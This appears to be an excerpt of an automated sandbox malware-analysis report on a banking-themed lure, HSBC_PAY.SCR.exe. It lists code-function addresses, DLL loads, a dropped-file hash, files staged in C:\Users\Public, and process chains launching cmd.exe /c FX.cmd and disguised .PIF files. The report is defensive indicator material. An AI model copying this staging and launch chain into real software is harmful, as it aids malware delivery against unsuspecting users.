                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF0E08_2_1E8BF0E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7EF1728_2_1E7EF172
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80B1B08_2_1E80B1B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8CB16B8_2_1E8CB16B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E83516C8_2_1E83516C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E812E908_2_1E812E90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BCE938_2_1E8BCE93
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BEEDB8_2_1E8BEEDB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BEE268_2_1E8BEE26
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E800E598_2_1E800E59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E87EFA08_2_1E87EFA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E842F288_2_1E842F28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E820F308_2_1E820F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F2FC88_2_1E7F2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A2F308_2_1E8A2F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E874F408_2_1E874F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A0CB58_2_1E8A0CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E800C008_2_1E800C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F0CF28_2_1E7F0CF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E818DBF8_2_1E818DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80AD008_2_1E80AD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89CD1F8_2_1E89CD1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FADE08_2_1E7FADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FEA808_2_1E7FEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B6BD78_2_1E8B6BD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BAB408_2_1E8BAB40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E82E8F08_2_1E82E8F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80A8408_2_1E80A840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8028408_2_1E802840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7E68B88_2_1E7E68B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8029A08_2_1E8029A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8CA9A68_2_1E8CA9A6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8169628_2_1E816962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81C6E08_2_1E81C6E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FC7C08_2_1E7FC7C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8247508_2_1E824750
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8007708_2_1E800770
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8AE4F68_2_1E8AE4F6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A44208_2_1E8A4420
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B24468_2_1E8B2446
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C05918_2_1E8C0591
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8005358_2_1E800535
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8802C08_2_1E8802C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A02748_2_1E8A0274
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C03E68_2_1E8C03E6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80E3F08_2_1E80E3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BA3528_2_1E8BA352
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8920008_2_1E892000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C01AA8_2_1E8C01AA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B41A28_2_1E8B41A2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B81CC8_2_1E8B81CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F01008_2_1E7F0100
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89A1188_2_1E89A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8881588_2_1E888158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004015608_1_00401560
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004020588_1_00402058
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004025B08_1_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004028708_1_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004010E08_1_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004032308_1_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004012C08_1_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004033508_1_00403350
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004015538_1_00401553
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_00401D698_1_00401D69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_00401D708_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\uzonfntK.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: String function: 029946A4 appears 154 times
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: String function: 029A8798 appears 48 times
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: String function: 0299480C appears 619 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 29027E54 appears 108 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 1E835130 appears 58 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 1E86EA12 appears 86 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 29015130 appears 58 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 2905F290 appears 105 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 1E847E54 appears 108 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 1E7EB970 appears 265 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 1E87F290 appears 105 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 28FCB970 appears 265 times
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: String function: 2904EA12 appears 86 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A844D0 appears 32 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A846A4 appears 244 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A9881C appears 45 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A98798 appears 54 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A844AC appears 73 times
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: String function: 02A8480C appears 931 times
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216A6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
Source: HSBC_PAY.SCR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.evad.winEXE@21/7@2/2
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A87F52 GetDiskFreeSpaceA
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A96D48 CoCreateInstance
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | File created: C:\Users\Public\KtnfnozuF.cmd
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HSBC_PAY.SCR.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | File read: C:\Users\user\Desktop\HSBC_PAY.SCR.exe
Source: unknown | Process created: C:\Users\user\Desktop\HSBC_PAY.SCR.exe "C:\Users\user\Desktop\HSBC_PAY.SCR.exe"
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Ktnfnozu.PIF "C:\Users\Public\Libraries\Ktnfnozu.PIF"
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Ktnfnozu.PIF "C:\Users\Public\Libraries\Ktnfnozu.PIF"
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: winhttpcom.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ??????????.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ??.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: am.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: am.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ???.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: am.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ??l.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ?.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ??l.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ????.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ???e???????????.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ?.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: ??l.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: tquery.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: cryptdll.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: spp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vssapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vsstrace.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: spp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vssapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vsstrace.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: advapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: spp.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vssapi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: vsstrace.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppwmi.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppcext.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: winscard.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: version.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: url.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: am.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: tquery.dllJump to behavior
